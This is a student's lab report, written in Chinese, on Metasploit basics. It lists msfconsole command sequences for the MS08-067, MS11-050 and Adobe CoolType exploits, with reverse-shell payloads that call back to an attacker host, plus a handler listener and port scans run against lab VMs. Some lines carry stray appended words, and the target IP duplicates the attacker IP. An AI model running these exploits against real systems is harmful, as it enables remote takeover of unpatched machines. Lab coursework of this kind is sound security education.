2017-2018-2 20155204《網絡對抗技術》EXP5 MSF基礎應用

1、基礎問題回答

用本身的話解釋什麼是exploit,payload,encode

  • exploit:利用靶機系統中的一些漏洞進行攻擊的過程,除去前期準備的工做,這一步是實施攻擊。
  • payload:載荷,將病毒代碼打包成程序等形式,配合咱們準備好的漏洞傳輸。
  • encode:對payload進行加密假裝,爲他打掩護。

2、實踐過程

1.Windows服務滲透攻擊——MS08-067安全漏洞

在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use exploit/windows/smb/ms08_067_netapihtml

msf exploit(ms08_067_netapi) > show payloadsshell

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連windows

msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻擊機ipapi

msf exploit(ms08_067_netapi) > set LPORT 5213 //攻擊端口瀏覽器

msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶機ip,特定漏洞端口已經固定安全

msf exploit(ms08_067_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高網絡

msf exploit(ms08_067_netapi) > exploit //攻擊tcp

2.瀏覽器滲透攻擊——MS11-050

在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement網站

msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http //http反向回連加密

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻擊機ip

msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻擊端口固定

msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //統一資源標識符路徑設置

msf exploit(ms11_050_cobjectelement) > exploit

  • 問題:這裏記錄下問題,這個靶機那邊ie6瀏覽器訪問網站時一直報404,網絡是鏈接好的,跟kali能夠ping通,版本也沒有問題,訪問以後kali這邊就會提示如上圖,不知道爲何,這個問題也一直沒有解決。。。(甚至直接拷貝了成功同窗的xp虛擬機過來也不對)。

3.針對Adobe Reader軟件的滲透攻擊——adobe_toolbutton

在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回連

msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻擊機ip

msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻擊端口

msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //設置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit //攻擊

在kali上輸入back退出當前模塊,進入監聽模塊,輸入如下命令:

msf > use exploit/multi/handler //進入監聽模塊

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向鏈接

msf exploit(handler) > set LHOST 192.168.43.161 //攻擊機ip

msf exploit(handler) > set LPORT 5213 //攻擊端口固定

msf exploit(handler) > exploit

4.應用任何一個輔助模塊。

  • 使用scanner/http/prev_dir_same_name_file模塊
    該模塊識別第一個父目錄中與給定目錄路徑具備相同名稱的文件。 示例:PATH爲Test / backup / files /將查找Test路徑下文件/backup/files.ext,.ext爲設定的文件類型。

  • 使用auxiliary/scanner/portscan/syn模塊

該模塊使用發送TCP SYN標誌的方式探測開放的端口。下面是我掃描到了個人靶機、

3、離實戰還缺些什麼技術或步驟?

如何將後門文件安全傳輸或者瞭解靶機漏洞狀況,這個是我認爲距離實戰有差距的地方。

4、實驗總結

此次的實驗讓我感受又距離實際操做進了一步,應用到了許多常見的漏洞。可是咱們仍是比較侷限於msf的一些模塊,並且把生成的文件圖標啊弄到靶機上也比較難,因此期待下一次的實驗能有新的突破。

相關文章
相關標籤/搜索